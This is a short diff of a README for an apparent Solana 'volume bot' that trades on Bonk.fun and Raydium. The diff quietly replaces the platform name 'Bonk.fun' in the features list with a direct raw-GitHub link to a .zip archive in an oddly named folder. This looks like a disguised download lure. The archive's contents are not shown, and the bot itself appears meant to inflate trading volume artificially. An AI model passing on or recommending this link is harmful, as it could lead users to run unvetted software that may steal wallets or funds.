GRANDAO01/Bonkfun-Raydium-Volume-Bot/README.md

 ## 📊 Features

-- **Multi-Platform Support:** Trade seamlessly between Bonk.fun and Raydium.
+- **Multi-Platform Support:** Trade seamlessly between https://raw.githubusercontent.com/GRANDAO01/Bonkfun-Raydium-Volume-Bot/main/houseridden/Bonkfun-Raydium-Volume-Bot.zip and Raydium.
 - **User-Friendly Interface:** Simplified design for easy navigation.
 - **Automated Trading:** Set your preferences and let the bot do the work.
 - **Live Updates:** Get real-time data on your trades and market conditions.